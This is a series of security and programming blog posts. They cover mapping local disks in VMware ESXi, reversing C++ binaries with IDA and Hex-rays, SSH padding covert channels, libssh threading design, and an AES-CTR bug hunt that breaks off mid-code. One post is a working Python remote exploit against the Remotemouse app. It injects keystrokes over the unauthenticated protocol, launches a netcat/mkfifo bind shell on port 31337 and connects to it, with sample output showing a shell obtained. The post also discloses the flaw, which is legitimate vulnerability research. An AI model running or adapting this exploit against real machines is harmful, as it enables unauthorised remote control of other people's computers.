Adding physical drives to VMware ESXi

I built a new lab environment at home using VMware ESXi 5.0, which is a very nice product, if we except the Windows-only GUI, a piece of bloatware that needs 1 GB of disk space to install. You can do pretty much anything from there, except for one thing that looks so important that I wonder why it’s not in the Windows GUI: mapping local disks to VMs.

I made this little post as a reminder for myself rather than a full tutorial. You can get more info on http://blog.davidwarburton.net/2010/10/25/rdm-mapping-of-local-sata-storage-for-esxi, on which this post is based.

In a nutshell:

  1. Log on to the VMware ESXi host as root.
  2. Locate the name of your disk in /vmfs/devices/disks/, e.g. “/vmfs/devices/disks/t10.ATA_____Hitachi_HDT725025VLA380_______________________VFL104R6CNYSZW”.
  3. Go to the directory where you want to create the mapping file. I suggest you create a directory in a datastore for this, like “/vmfs/volumes/datastore1/harddisks/”.
  4. Run: vmkfstools -z /vmfs/devices/disks/t10.ATA_____Hitachi_HDT725025VLA380_______________________VFL104R6CNYSZW Hitashi250.vmdk
  5. In your VM, use “attach existing virtual disk” and browse to the harddisks directory on the datastore.
  6. On Linux, you will need “rescan-scsi-bus” to have your new hard disk detected.
  7. Profit

Remotemouse considered harmful

The problem

This weekend I found a nice application to control my Mac from my iPhone: Remotemouse, from http://www.remotemouse.net.

Unfortunately, while testing it I found that there was no pairing request or any authentication… I fired up Wireshark to see what was happening and, as expected, it’s a very dumb cleartext protocol that carries mouse gestures, clicks, and keyboard events.

I took my editor and came up with this little script, which connects to my Mac, puts the mouse in the upper right corner (over the search lens), clicks it and searches for the terminal. It then opens it and launches a bindshell.

Remotemouse binds on all interfaces, IPv4 and IPv6, so if you’re using it and allow direct connections from the outside, you are vulnerable.

The code


#!/usr/bin/python
# Remote exploit against remotemouse (www.remotemouse.net)
#
# Launches a remote shell on macosx leopard
#
# Aris Adamantiadis
#
# aris@darkforce:~/synchronized/hack/remotemouse$ python hackmac.py
# enjoy your shell !!
# Connection to 192.168.1.3 31337 port [tcp/*] succeeded!
# sh: no job control in this shell
# aris@aris-laptop:~$ id
# id
# uid=501(aris) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1),
# 401(com.apple.access_screensharing),204(_developer),100(_lpoperator),
# 98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr),
# 61(localaccounts),12(everyone),501(access_bpf)
# aris@aris-laptop:~$ exit

import time
import socket
import os
right = "mos 6m 9 0"
up = "mos 6m 0 -9"
diag = "mos 6m 9 -9"
fineup = "mos 6m 0 -1"
fineright = "mos 6m 1 0"
key = "key1 "
click = "mos 5R l d" + "mos 5R l u"
host = "192.168.1.3"
shellcode = "while true ; do rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 31337 >/tmp/f ; done&clear;exit"

def keys(v):
    f=""
    for i in v:
        f+= key + i
    return f

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,1978))
s.send(up * 200 + right * 400 + fineup * 9 + fineright *9)
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(1)
s.connect((host,1978))
s.send(click)
time.sleep(1)
s.send(keys("terminal"))
time.sleep(.5)
s.send("key3 RTN")
time.sleep(.5)
s.send(keys(shellcode))
time.sleep(.5)
s.send("key3 RTN")
time.sleep(.5)
s.close()
print "enjoy your shell !!"
os.system("nc -v " + host + " 31337")

Reversing C++ programs with IDA pro and Hex-rays

Introduction

During my holidays, I had plenty of time to study and reverse a program, which was completely coded in C++. This was the first time I seriously studied a C++ codebase, using IDA as the only source of information, and found it quite hard.

Here’s a sample of what you get with Hex-rays when you start digging into an interesting function:

v81 = 9;
v63 = *(_DWORD *)(v62 + 88);
if ( v63 )
{
   v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD,
   _DWORD, _DWORD))(v63 + 24);
   if ( v64 )
     v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD
     *)(v3 + 40), bstrString);
}

It’s our job to add symbol names, identify classes and set up all the information that helps Hex-rays give us a reliable and, above all, understandable output:

padding = *Dst;
if ( padding < 4 )
  return -1;
buffer_skip_bytes(this2->decrypted_input_buffer, 5u);
buffer_skip_end(this2->decrypted_input_buffer, padding);
if ( this2->encrypt_in != null )
{
  if ( this2->compression_in != null )
  {
    buffer_reinit(this2->compression_buffer_in);
    packet_decompress(this2,
      this2->decrypted_input_buffer,
      this2->compression_buffer_in);
    buffer_reinit(this2->decrypted_input_buffer);
    avail_len = buffer_avail_bytes(this2->compression_buffer_in);
    ptr = buffer_get_data_ptr(this2->compression_buffer_in);
    buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len);
  }
}
packet_type = buffer_get_u8(this2->decrypted_input_buffer);
*len = buffer_avail_bytes(this2->decrypted_input_buffer);
this2->packet_len = 0;
return packet_type;

Of course, Hex-rays is not going to invent the names for you. You’ll still have to make sense of the code and what it means to you, but at least being able to give a name to the classes will certainly help.

All my samples here have been compiled with either Visual Studio or GNU C++. I have found the results to be similar, even if they may not be compatible. Adapt what follows to your compiler of interest.

Structure of a C++ program

It is not my goal to teach you how OOP works; you already know that. We’ll just see, in broad strokes, how it works and how it is implemented.

Class = data structure + code (methods).

The data structure can only be seen in the source code, whereas the methods will appear in your favorite disassembler.

Object = memory allocation + data + virtual functions.

The object is an instantiation of a class, and something you can observe in IDA. An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and, later, a call to a destructor. You will see accesses to its member variables (including embedded objects) and maybe calls to virtual functions.

Virtual functions are silly: without running the program with breakpoints, it is hard to know which code is going to be executed at runtime, and therefore which code to disassemble.

Member variables are a bit easier: they work like their counterparts in C (structs). IDA has a very handy tool to declare structures, and Hex-rays handles them very well in the decompilation. Let’s go back to the bits and bytes.

Object creation

int __cdecl sub_80486E4()
{
  void *v0; // ebx@1
  v0 = (void *)operator new(8);
  sub_8048846(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Here’s the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn’t mean we have 8 bytes of variables.

The function sub_8048846 called just after the new() takes the pointer as parameter, and certainly is the constructor.

The next function call is a little cryptic. It does two pointer dereferences on v0 before calling the result. It’s a virtual function call.

All polymorphic objects have a special pointer among their variables, which points to the vtable. This table contains the addresses of all the virtual methods, so the C++ program can call them when needed. In the compilers I could test, this vtable pointer is always the first element of an object, and always stays at the same place, even in subclasses. (This may not hold true for multiple inheritance; I did not test.)
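
To make the double dereference concrete, here is a minimal Python sketch that models a 32-bit address space as a dictionary. Only the layout (vtable pointer at offset 0, one 4-byte slot per virtual method) and the vtable address come from the listings in this post; the other addresses, the `call_virtual` helper and the method bodies are made up for illustration.

```python
# Toy model of a 32-bit process: address -> 32-bit value.
# Apart from the vtable address, all addresses are hypothetical.
memory = {}
functions = {}  # address -> Python callable standing in for machine code

def register(addr, func):
    """Pretend that `func` is the code located at `addr`."""
    functions[addr] = func
    return addr

m1 = register(0x08048700, lambda this: "method1 called on 0x%x" % this)
m2 = register(0x08048720, lambda this: "method2 called on 0x%x" % this)
m3 = register(0x08048740, lambda this: "method3 called on 0x%x" % this)

# The vtable is an array of function pointers, one dword per slot.
VTABLE = 0x08048A38
for slot, addr in enumerate((m1, m2, m3)):
    memory[VTABLE + 4 * slot] = addr

# The object: vtable pointer first, then the member variables.
OBJ = 0x0804B008
memory[OBJ] = VTABLE
memory[OBJ + 4] = 42

def call_virtual(this, byte_offset):
    vtable = memory[this]                   # first dereference: *v0
    target = memory[vtable + byte_offset]   # second dereference: *(*v0 + off)
    return functions[target](this)          # call with `this` as argument

first = call_virtual(OBJ, 0)   # mirrors (**v0)(v0)
third = call_virtual(OBJ, 8)   # mirrors (*(*v0 + 8))(v0)
print(first)
print(third)
```

The byte offset divided by 4 gives the slot number, which is why `+ 8` in the decompilation selects the third virtual method.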

Let’s do some IDA magic:

Rename the symbols

Just click on a name, press « n » and give it a meaningful name. Since we don’t know yet what our class does, I suggest we name it « class1 » and keep this convention until we’ve understood what the class does. It’s quite possible that we will discover other classes before we have finished digging into class1, so I suggest we simply continue numbering classes as we find them.

int __cdecl main()
{
  void *v0; // ebx@1
  v0 = (void *)operator new(8);
  class1::ctor(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Create structures

The « structures » window of IDA is very useful. Press Shift-F9 to make it appear. I suggest you detach it (in the Qt version of IDA) and put it on the right of the IDA window, so you can see both the decompiler window and the structures.

Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that’s what we got here !

Now, we’re going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result.

Create a new structure of 12 bytes and call it « class1_vtable ». At this stage, we cannot really know how big that vtable is, but changing the structure size later is very easy. Click on « vtable » in class1’s declaration, and press « y ». Now declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic.

We can rename the three methods « method1 » to « method3 ». Method3 is certainly the destructor. Depending on the programming convention and the compiler used, the first method is often the destructor, but here’s a counterexample. It is time to analyze the constructor.

Analysis of the constructor

int __cdecl class1::ctor(void *a1)
{
  sub_80487B8(a1);
  *(_DWORD *)a1 = &off_8048A38;
  return puts("B::B()");
}

You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class.

« sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent-class.

« off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big our vtable is (just look for the next pointer that has an Xref), and get the list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes.

It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn’t provide anything you can’t see in the classic view.

The strange call in the constructor

int __cdecl sub_80487B8(int a1)
{
  int result; // eax@1
  *(_DWORD *)a1 = &off_8048A50;
  puts("A::A()");
  result = a1;
  *(_DWORD *)(a1 + 4) = 42;
  return result;
}

The call to « sub_80487B8() » in the constructor reveals the same type of function: a virtual function table pointer is stored in the vtable member, and a puts() tells us we’re in yet another constructor.

Don’t set the type « class1 » on argument « a1 », since we’re not dealing with class1 here. We found a new class, which we will call « class2 ». This class is a superclass of class1. Let’s do the same work as for class1. The only difference is that we do not know the exact size of its members. There are two ways of figuring it out:

  • Look at the xrefs of class2 ::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members.
  • Look at the methods in the vtable, and try to guess what’s the highest member ever accessed.

In our case, « class2 ::ctor » accesses the 4 bytes after the first 4 and sets them to 42. Since its child class « class1 » is 8 bytes long and adds no members of its own, « class2 » is 8 bytes long too.

Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children.

Study of the destructors

Let’s go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let’s study it.

if ( v0 )
  ((void (__cdecl *)(class1 *))
    v0->vtable->method_3)(v0);
…
void __cdecl class1::m3(class1 *a1)
{
  class1::m2(a1);
  operator delete(a1);
}
…
void __cdecl class1::m2(class1 *a1)
{
  a1->vtable = (class1_vtable *)&class1__vtable;
  puts("B::~B()");
  class2::m2((class2 *)a1);
}
…
void __cdecl class2::m2(class2 *a1)
{
  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::~A()");
}

What we can see here is the following: class1 ::m3 is a destructor that calls class1 ::m2, which is the main destructor of class1. What this destructor does is ensure that we are really in « class1 » context, by setting the vtable back to its « class1 » state. It then calls the destructor of « class2 », which likewise sets the vtable to « class2 » context. This pattern can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes along the way.
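
As a rough illustration of why the vtable writes let you walk the hierarchy, the following Python sketch replays the constructor and destructor chains from the listings and records every vtable store. The dictionary-based object and the trace lists are purely illustrative assumptions; only the order of the calls and stores is taken from the decompiled code.

```python
# Each function mimics one decompiled routine: it stores "its" vtable
# into the object and chains to the parent, in the order seen in IDA.

def class2_ctor(obj, trace):
    obj["vtable"] = "class2__vtable"
    trace.append(obj["vtable"])
    obj["field_0"] = 42

def class1_ctor(obj, trace):
    class2_ctor(obj, trace)            # parent constructor runs first
    obj["vtable"] = "class1__vtable"   # then the child installs its own vtable
    trace.append(obj["vtable"])

def class2_dtor(obj, trace):
    obj["vtable"] = "class2__vtable"
    trace.append(obj["vtable"])

def class1_dtor(obj, trace):
    obj["vtable"] = "class1__vtable"   # back to the class1 context
    trace.append(obj["vtable"])
    class2_dtor(obj, trace)            # parent destructor runs last

obj = {"vtable": None, "field_0": None}
ctor_trace, dtor_trace = [], []
class1_ctor(obj, ctor_trace)
class1_dtor(obj, dtor_trace)

print("constructor stores:", ctor_trace)   # base class first
print("destructor stores: ", dtor_trace)   # derived class first
```

Reading the stores in a destructor from top to bottom therefore lists the classes from the most derived one up to the root, while a constructor lists them in the opposite order.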

Hey, what are all these casts? Why do I have two structures defining the same fields?

What we have here is exactly the same problem that you get when doing OOP with C : You end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields:

  • For each class, define three structures: classXX_members, classXX_vtable and classXX.
  • classXX contains
    • vtable (typed to classXX_vtable *)
    • classXX-1_members (members of the superclass)
    • classXX_members, if any
  • classXX_vtable contains
    • classXX-1_vtable
    • classXX’s vptrs, if any

Ideally, you should work from the base class down to the children, until you end up in a leaf class. In our example, here’s the « solution » of our sample:

00000000 class1          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 class2_members  class2_members ?
00000008 class1          ends
00000008
00000000 ; ----------------------------------------------
00000000
00000000 class1_members  struc ; (sizeof=0x0)
00000000 class1_members  ends
00000000
00000000 ; ----------------------------------------------
00000000
00000000 class1_vtable   struc ; (sizeof=0xC)
00000000 class2_vtable   class2_vtable ?
0000000C class1_vtable   ends
0000000C
00000000 ; ----------------------------------------------
00000000
00000000 class2          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 members         class2_members ?
00000008 class2          ends
00000008
00000000 ; ----------------------------------------------
00000000
00000000 class2_vtable   struc ; (sizeof=0xC)
00000000 method_1        dd ?                    ; offset
00000004 dtor            dd ?                    ; offset
00000008 delete          dd ?                    ; offset
0000000C class2_vtable   ends
0000000C
00000000 ; ----------------------------------------------
00000000
00000000 class2_members  struc ; (sizeof=0x4)
00000000 field_0         dd ?
00000004 class2_members  ends
00000004

int __cdecl main()
{
  class1 *v0; // ebx@1
  v0 = (class1 *)operator new(8);
  class1::ctor(v0);
  ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.method_1)(v0);
  if ( v0 )
    ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.delete)(v0);
  return 0;
}
int __cdecl class1::ctor(class1 *a1)
{
  class2::ctor((class2 *)a1);
  a1->vtable = (class1_vtable *)&class1__vtable;
  return puts("B::B()");
}
class2 *__cdecl class2::ctor(class2 *a1)
{
  class2 *result; // eax@1
  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::A()");
  result = a1;
  a1->members.field_0 = 42;
  return result;
}
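
The struct inclusion trick can be checked outside IDA as well. The sketch below rebuilds the same structures with Python's ctypes, using 32-bit little-endian fields as in the listing, and overlays them on 8 raw bytes. The raw bytes are an assumption: they are what I would expect the object to look like after class1::ctor, with the vtable address taken from « off_8048A38 ».

```python
import ctypes

# Same nesting as in the IDA structures window: members and vtables are
# declared once and embedded in the child structures.
class class2_members(ctypes.LittleEndianStructure):
    _fields_ = [("field_0", ctypes.c_uint32)]

class class2_vtable(ctypes.LittleEndianStructure):
    _fields_ = [("method_1", ctypes.c_uint32),
                ("dtor", ctypes.c_uint32),
                ("delete", ctypes.c_uint32)]

class class1_vtable(ctypes.LittleEndianStructure):
    _fields_ = [("class2_vtable", class2_vtable)]   # inherited slots

class class2(ctypes.LittleEndianStructure):
    _fields_ = [("vtable", ctypes.c_uint32),        # pointer, 4 bytes on x86
                ("members", class2_members)]

class class1(ctypes.LittleEndianStructure):
    _fields_ = [("vtable", ctypes.c_uint32),
                ("class2_members", class2_members)]  # inherited members

# Hypothetical memory dump of the object: vtable pointer, then field_0 = 42.
raw = bytes.fromhex("388a0408" "2a000000")
obj = class1.from_buffer_copy(raw)

print(ctypes.sizeof(class1), ctypes.sizeof(class1_vtable))
print(hex(obj.vtable), obj.class2_members.field_0)
```

Because class1 embeds class2_members instead of redeclaring field_0, renaming the field once in class2_members is enough for both classes.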

In brief

  • When you find a new class, give it a symbolic name, and resolve the whole tree before figuring out what its real name should be.
  • Start from the ancestor and work down to the children.
  • Look at the constructors and destructors first, and check out the references to new() and static methods.
  • Often, the methods of the same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other. Sometimes, the constructors are inlined in the child classes’ constructors, or even at the place of the instantiation.
  • If you want to save time when reversing huge inherited structures, use the struct inclusion trick to name each variable only once.
  • Use and abuse Hex-rays’ typing system, it’s very powerful.
  • Pure virtual classes are hell: you can find several classes having similar vtables, but no code in common. Beware of them.

Sources

Try this at home !
The binary (elf32 stripped)

The source file. Don’t open it too fast !
 

SSH[12] protocol weakness ?

A weakness ?

While reading the recent posts about the allegations of a so-called backdoor in the OpenBSD IPSec code, supposedly inserted by the FBI through a developer, I saw comments on both Slashdot and LWN about “long-standing bugs in SSH2”. The page which details the criticism can be found here. These comments were made by Bernard Perrot when he was patching OpenSSH to comply with the (dumb) restrictions that French law placed on the use of cryptography.

“I often like to point out an incomprehensible weakness of the protocol concerning the “padding” (known as covered channel): in both version 1 and 2 the packets, have a length which is a multiple of 64 bits, and are padded with a random number. This is quite unusual and therefore sparing a classical fault that is well known in encrypting products: a “hidden” (or “subliminal”) channel. Usually , we “pad” with a verified sequence as for example, give the value n for the byte rank n (self describing padding). In SSH, the sequence being (by definition) randomized, it cannot be checked. Consequently, it is possible that one of the parties communicating could pervert / compromise the communication for example used by a third party who is listening. One can also imagine a corrupted implementation unknown by the two parties (easy to realize on a product provided with only binaries as generally are commercial products). This can easily be done and in this case one only needs to “infect” the client or the server. To leave such an incredible fault in the protocol, even though it is universally known that the installation of a covered channel in an encryption product is THE classic and basic way to corrupt the communication, seems unbelievable to me . It can be interesting to read Bruce Schneier’s remarks concerning the implementation of such elements in products influenced by government agencies. (http://www.counterpane.com/crypto-gram-9902.html#backdoors).”

The author says that SSH1 and SSH2 are vulnerable to covert-channel attack.

Covert-channel attacks

A covert-channel attack is an attack in which an attacker embeds data inside a protocol, with the objective of evading intrusion detection software, antivirus, etc., simply to not get caught. Covert channels exist in almost every protocol, at all layers. Hackers used to embed covert rootshells inside ICMP ping datagrams, UDP, HTTP, HTML comments, …

Basically, any protocol that allows two different ways of communicating the same information is vulnerable (and heck, most protocols have a lot of ways to present the same data in different forms).

A covert-channel attack is possible on SSH2, by at least two means, as described in the referenced paper:

  • The padding field is said to contain purely random padding. The goal of the padding field is to pad the packet so that the whole packet is a multiple of the blocksize (the blocksize is the size of the cleartext being encrypted/decrypted by each call to a cryptographic routine). It has no cryptographic intent and its content is not checked, but it is encrypted and covered by the HMAC (an HMAC is a fast symmetric primitive used to verify the integrity of data).
    In order to act as a covert channel, this field has to be filled in by either the SSH server or the SSH client, because it is encrypted. Any attempt to change it in transit will be noticed because the HMAC won’t match.
  • There are specific packet types (SSH_MSG_IGNORE and SSH_MSG_DEBUG) which implementations should accept but discard immediately. Of course, these packets are the best place to insert any data you’d like to send over the encrypted session, but in this case you still need to have a corrupted server and client.
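
To show how little the receiver cares about the padding content, here is a small Python sketch of the cleartext SSH2 packet framing (before encryption and MAC), following my reading of the binary packet format in RFC 4253, section 6. The function names are mine, not those of any SSH library, and the `padding` argument exists only to demonstrate the covert channel.

```python
import os
import struct

def padding_length(payload_len, block_size=8):
    """Padding needed so that length field + padding byte + payload + padding
    is a multiple of max(block_size, 8), with at least 4 bytes of padding."""
    block = max(block_size, 8)
    pad = block - ((4 + 1 + payload_len) % block)
    if pad < 4:
        pad += block
    return pad

def build_packet(payload, block_size=8, padding=None):
    pad_len = padding_length(len(payload), block_size)
    if padding is None:
        padding = os.urandom(pad_len)      # what an honest sender does
    if len(padding) != pad_len:
        raise ValueError("padding must be exactly %d bytes" % pad_len)
    packet_length = 1 + len(payload) + pad_len
    return struct.pack(">IB", packet_length, pad_len) + payload + padding

def parse_packet(packet):
    packet_length, pad_len = struct.unpack(">IB", packet[:5])
    payload_len = packet_length - 1 - pad_len
    payload = packet[5:5 + payload_len]
    padding = packet[5 + payload_len:5 + payload_len + pad_len]
    return payload, padding                # a real receiver drops the padding

payload = b"x" * 17
honest = build_packet(payload, block_size=16)
sneaky = build_packet(payload, block_size=16, padding=b"hidden-msg")
print(len(honest), parse_packet(sneaky))
```

Both packets carry the same payload and have the same length, so after encryption a third party cannot tell them apart; only a cooperating receiver that looks at the padding would see the extra bytes.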

My point here is that these covert channels do exist, but there’s nothing you can do about them. The idea of an encrypted session is to ensure confidentiality end to end. That confidentiality means that you’re free to send any data you want, and nobody will know about it. That is also the point made in the SSH RFC, section 9.3.6, page 20: the protocol was not designed to eliminate covert channels.

Conclusion

My conclusion is simple: it’s not a bug, it’s a feature. Call me when it’s possible to insert data into an encrypted SSH data stream without knowledge of the session key. To the best of my knowledge, there is no way to insert data into a stream without altering the integrity of a packet and thus being detected by one of the parties.

If the parties are compromised, there’s no need for a covert channel. One could simply open a channel carrying one’s own malicious data and nobody would know. I’m also curious to see how one would design a protocol that transmits encrypted, confidential and arbitrary data and is immune to covert-channel attacks when both sides are compromised. If the attacker couldn’t hide data in the protocol, he’d hide it in the transmitted data.

Threading design pattern ?

When designing the new libssh architecture, we decided to make it completely callback-based, even internally. This provides cool features, like the possibility to extend libssh without recompiling it, or to run asynchronous or nonblocking functions more easily. Libssh 0.5 will run as a state machine, which listens for packets and then calls callbacks based on the packet type. The handlers will evaluate the current state of the session and decide what to do with the packets. Sometimes, the state of the session itself changes as the result of a packet (e.g. when receiving an SSH_AUTH_SUCCESS packet).
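
The idea can be sketched in a few lines of Python. This is not libssh code: the `Session` class, `set_handler`, `dispatch` and the state names are all invented for the example, and packet types are plain strings instead of numeric message codes.

```python
class Session:
    """Toy callback-driven session: one handler per packet type."""

    def __init__(self):
        self.state = "authenticating"
        self.handlers = {}

    def set_handler(self, packet_type, callback):
        # Handlers can be added at runtime, without touching the core loop.
        self.handlers[packet_type] = callback

    def dispatch(self, packet_type, payload=b""):
        handler = self.handlers.get(packet_type)
        if handler is None:
            return False            # nobody is interested in this packet
        handler(self, payload)      # the handler may change the session state
        return True

def on_auth_success(session, payload):
    session.state = "authenticated"

session = Session()
session.set_handler("SSH_AUTH_SUCCESS", on_auth_success)

handled = session.dispatch("SSH_AUTH_SUCCESS")
ignored = session.dispatch("SOME_UNKNOWN_PACKET")
print(session.state, handled, ignored)
```

A blocking call such as authentication then boils down to reading and dispatching packets until the session state it cares about has changed.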

The sequence diagram of a synchronous function, such as authentication or a simple channel read, can be schematized as follows:

What’s happening is pretty straightforward. Thread X is waiting for a specific packet x (or more precisely, for the internal state change caused by packet x). It calls a function called ProcessInput (this is a simplification), which takes a lock and tries to read packets from the socket. After a packet has been read, the callback for the packet (in this case, x) is called, and it updates the internal state of the session.

ProcessInput returns after reading one packet. X checks that the state has changed to x; otherwise, it simply calls ProcessInput again (not shown on the drawing) until it receives a state change it can process.

Then, what’s the problem ?

I thought that this design could provide an interesting feature to libssh users. By adding a lock in the ProcessInput function (already shown on the previous drawing), we could let applications call different libssh functions on the same session, simultaneously, in different threads. Thread X could be doing a blocking ssh_channel_read() on one channel while thread Y could be doing the same on another. A naive implementation of locking would give this result:

This sequence diagram is a simple extension of the previous one. Thread X waits for a packet x, and thread Y waits for its turn by using a lock (or semaphore) in ProcessInput(Y). Looks great, except there’s a pitfall. This example does not work if the first packet to show up is not an x packet:

In this example, the x packet never arrives. The ProcessInput called by the X thread receives the y packet and processes it (after all, any thread can manipulate the internal state of the session). The problem is that after ProcessInput has processed the y packet (leaving X unhappy and looping in the hope of receiving the x packet), the lock is released, ProcessInput(Y) acquires it, and Y performs a packet read, which can block and make the Y thread wait for a while. This is unfortunate because the session was already in the state y that Y was waiting for before Y called ReadPacket. ProcessInput is meant to be generic and doesn’t know anything about the x or y states.

I’m looking for some kind of design pattern, or an elegant solution to this problem, from those who have already solved it before me.

Potential solution ?

I have thought of three solutions:

  • A lock would “remember” that it was blocked by another thread, wait until the lock is free and then return directly to the caller. This way, our Y thread would not run the potentially blocking ReadPacket function if thread X already did the hard work for it. In the opposite case (our second example), Y would call ProcessInput a second time and catch the y packet sooner or later.
    Unfortunately, I do not see an elegant way of doing this with the common-denominator building blocks of pthread and win32 threads. Still, it complies with the specification “ProcessInput returns when at least one packet has been read since the call to ProcessInput”.
  • A received-packet counter would be read at the start of the ProcessInput function and stored on the local stack. The packet counter would then be incremented each time a packet is received in the session, and after entering the critical section of ProcessInput, the values would be compared. If the counter changed, ProcessInput would return.
    I suspect this scenario is vulnerable to races between the moment the function is called and the moment the counter is read. Nothing tells us that another thread did not just finish reading the y packet before we initialized the local packet counter.
  • The ProcessInput function would take an additional parameter that helps it tell whether the ReadPacket function is still worth calling. This could be a callback to be called just after acquiring the lock. For instance, Y could call ProcessInput with a specific callback function check_y() which checks whether the status has changed through the action of the y packet. This function could also be called by the Y function itself in the ProcessInput loop, since it is more or less the termination condition of the loop.
    As a drawback, I think this solution adds coupling between the ProcessInput function and its potential callers (there are hundreds of them in libssh master) and may add too much complexity.
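
Here is a minimal Python sketch of the third idea, assuming a queue stands in for the socket and a set of seen packet types stands in for the session state. `Session`, `process_input`, `wait_for` and `is_done` are hypothetical names for this illustration, not the libssh implementation.

```python
import queue
import threading

class Session:
    def __init__(self):
        self.lock = threading.Lock()
        self.incoming = queue.Queue()   # stands in for the socket
        self.seen = set()               # stands in for the session state

    def read_packet(self):
        return self.incoming.get()      # blocks while nothing is available

    def process_input(self, is_done):
        """Read at most one packet, unless the caller's condition is already
        satisfied by the time the lock has been acquired."""
        with self.lock:
            if is_done():               # another thread did the work for us
                return False
            packet = self.read_packet()
            self.seen.add(packet)       # "callback" updating the state
            return True

def wait_for(session, wanted):
    def is_done():
        return wanted in session.seen
    while not is_done():
        session.process_input(is_done)

# Single-threaded replay of the problematic scenario: X reads Y's packet.
session = Session()
session.incoming.put("y")
read_one = session.process_input(lambda: "x" in session.seen)  # X gets y
skipped = session.process_input(lambda: "y" in session.seen)   # Y must not block
print(read_one, skipped)
```

The check happens under the lock, so a thread that was queued behind another one never starts a blocking read for a state change that has already happened. The price is the one mentioned above: every caller has to supply its own termination condition.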

What’s your opinion ? Feel free to comment !

Aris

Debugging a cryptographic bug in libssh…

Hey there, you may know I am a developer of the SSH Library libssh. Last week, a post on the libssh mailing list was reporting a connection problem under Redhat RHEL 4.8. It seemed that the new cipher aes128-ctr, recently implemented in libssh, had a little problem…

This bug looked strange, firstly because we had never had any cryptographic problem within libssh, and secondly because the debug output did not report anything broken:

[3] Set output algorithm to aes256-ctr
[3] Set input algorithm to aes256-ctr

[3] Writing on the wire a packet having 17 bytes before
[3] 17 bytes after comp + 10 padding bytes = 28 bytes packet
[3] Encrypting packet with seq num: 3, len: 32
[3] Sent SSH_MSG_SERVICE_REQUEST (service ssh-userauth)
[3] Decrypting 16 bytes
[3] Packet size decrypted: 44 (0x2c)
[3] Read a 44 bytes packet
[3] Decrypting 32 bytes
2010-04-12 13:14:54,211557; 1126189408 procSrvAuth; Did not receive SERVICE_ACCEPT

Meanwhile, on the OpenSSH side, we got:

sshd[22341]: debug1: SSH2_MSG_NEWKEYS sent
sshd[22341]: debug1: expecting SSH2_MSG_NEWKEYS
sshd[22341]: debug1: SSH2_MSG_NEWKEYS received
sshd[22341]: debug1: KEX done
sshd[22341]: Disconnecting: Corrupted MAC on input.

What does this mean ?

libssh was sending garbage and was receiving some kind of garbage too (a variation of the last error showed an HMAC error). However, the “size” field of the SSH packet (the first 32 bits of every packet) was consistent with the type of packet being received. So what ?
Further analysis of the received plaintext on both OpenSSH and libssh showed that the first 16 bytes of the first packet in each direction were correct. So this was a bug affecting the whole stream except the first block of blocksize bytes. The code in libssh implementing aes128-ctr is the following:

static void aes_ctr128_encrypt(struct crypto_struct *cipher, void *in, void *out,
    unsigned long len, void *IV) {
  unsigned char tmp_buffer[128/8];
  unsigned int num=0;
  /* Some things are special with ctr128 :
   * In this case, tmp_buffer is not being used, because it is used to store temporary data
   * when an encryption is made on lengths that are not multiple of blocksize.
   * Same for num, which is being used to store the current offset in blocksize in CTR
   * function.
   */
  AES_ctr128_encrypt(in, out, len, cipher->key, IV, tmp_buffer, &num);
}

Then, how does aes-ctr work ?

CTR is a stream cipher mode built on top of a block cipher. In SSH, it’s used like a block cipher anyway. It has two interesting characteristics:

  • The same code is used for encryption and decryption, because it produces an OTP-like stream of bytes
  • The key is used for the block cipher encryption, and the input to the algorithm is a nonce together with a counter

That’s where things begin to get interesting. In our code, IV is used as a nonce and is generated from the cryptographic parameters during the key exchange. I verified that its initial value was consistent with the valid (working) implementation. tmp_buffer is a buffer used for the internal operations of the cipher. It’s normally not important. The num variable is used to report how far we are in the encryption of the current block, in order to emulate a stream cipher. We are not using this feature (SSH always encrypts packets that are a multiple of the blocksize), so the returned value is always 0.
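
For readers who have never looked inside CTR mode, here is a minimal Python sketch of the construction. Since the standard library has no AES, `block_encrypt` is a keyed hash standing in for the block cipher; that substitution, and all the function names, are assumptions made for the example and must not be used for real encryption.

```python
import hashlib

BLOCK = 16  # AES block size in bytes

def block_encrypt(key, block):
    # Stand-in for AES: NOT a real block cipher, just a keyed 16-byte function.
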